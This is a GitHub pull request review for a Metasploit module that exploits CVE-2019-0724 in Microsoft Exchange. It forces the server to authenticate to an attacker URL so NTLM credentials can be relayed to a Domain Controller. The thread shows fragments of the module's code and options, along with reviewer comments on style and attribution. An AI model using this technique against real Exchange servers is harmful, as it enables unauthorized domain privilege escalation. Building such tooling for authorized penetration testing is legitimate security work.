### PR TITLE
Added Exchange Web Services PushSubscription CVE-2019-0724 auxiliary module 

### PR DESCRIPTION
**Pull request by pkb1s**
Execution of the module will force Exchange to authenticate to an specified URL over HTTP via the Exchange PushSubscription feature. This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.

### CODE REVIEW

File: modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb [hunk 1]
```diff
@@ -0,0 +1,130 @@
...
+    super(
+      'Name'           => 'Microsoft Exchange Privilege Escalation Exploit',
+      'Description'    => %q{
+        This module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0724
+        Execution of the module will force Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature.
+        This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.
+        The module is based on the work by @_dirkjan,
+      },
+      'Author'         => 'Petros Koutroumpis',
+      'Reference'      =>
```
Comment (bcoles) [inline modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb]: References must consist of two elements.

```ruby
         [
           [ 'CVE', '2019-0724' ],
           [ 'URL', 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]
         ],
```

File: modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb [hunk 2]
```diff
@@ -0,0 +1,130 @@
...
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize
+    super(
+      'Name'           => 'Microsoft Exchange Privilege Escalation Exploit',
+      'Description'    => %q{
+        This module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0724
+        Execution of the module will force Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature.
+        This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.
+        The module is based on the work by @_dirkjan,
```
Comment (bcoles) [inline modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb]: Traditionally, authors are added to the `Author` array, with comments for attribution. For example, something like this:

```ruby
      'Author'         => [
        '@_dirkjan',         # Discovery and PoC
        'Petros Koutroumpis' # Metasploit
      ]
```

File: modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb [hunk 3]
```diff
@@ -0,0 +1,130 @@
...
+        Opt::RPORT(443),
+      ])
+  end
+
+  def run
+
+    domain = datastore['DOMAIN']
+    uri = datastore['TARGETURI']
+    exchange_version = datastore['EXCHANGE_VERSION']
+    attacker_url = datastore['ATTACKER_URL']
```
[the remark this answers is not in the document]
Comment (bcoles) [reply modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb]: On second thought, this is probably less useful than simply relaying with something like `auxiliary/server/http_ntlmrelay`.

Marking as resolved.

File: modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb (hunk 2 above)
Comment (pkb1s) [reply modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb]: Thanks for pointing this out. Should be okay now.

File: modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb [hunk 4]
```diff
@@ -0,0 +1,130 @@
...
+      'DisclosureDate' => 'Jan 21 2019'
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, "Username of any domain user with a mailbox on Exchange", nil ]),
+        OptString.new('PASSWORD', [ true, "Password or password hash (in LM:NT format) of the user", nil ]),
+        OptString.new('DOMAIN', [ true, "The Active Directory domain name", nil ]),
+        OptString.new('TARGETURI', [ true, "Exchange Web Services API endpoint", "/EWS/Exchange.asmx" ]),
+        OptString.new('EXCHANGE_VERSION', [ true, "Version of Exchange (2013|2016)", "2016" ]),
```
[the remark this answers is not in the document]
Comment (pkb1s) [reply modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb]: Unfortunately, I haven't found a way to automate this.

File: modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb [hunk 5]
```diff
@@ -0,0 +1,130 @@
...
+      res = http.send_recv(req)
+      xml = res.get_xml_document
+      http.close
+    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT, ::Rex::HostUnreachable
+      print_error("Connection failed")
+    rescue OpenSSL::SSL::SSLError, OpenSSL::Cipher::CipherError
+      print_error "SSL negotiation failed"
+    end
+
+    if res.code == 200
```
[the remark this answers is not in the document]
Comment (pkb1s) [reply modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb]: That is a good point.  I have amended the code.

**Comment by pkb1s** [comment]
Hello! Does this PR wait for an action from me or is it just that there is a big backlog and you haven't had the time to look into it?

File: modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb [hunk 6]
```diff
@@ -0,0 +1,148 @@
...
+           [ 'CVE', '2019-0724' ],
+           [ 'URL', 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]
+         ],
+       'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'RPORT' => 443
+        },
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Jan 21 2019'
```
Comment (dwelch-r7) [inline modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb]: Can you put this in ISO format please, i.e. 2019-01-21

**Comment by dwelch-r7** [comment]
# Release notes

Adds auxiliary module for forcing exchange to authenticate with a specified url

**Pull request merged**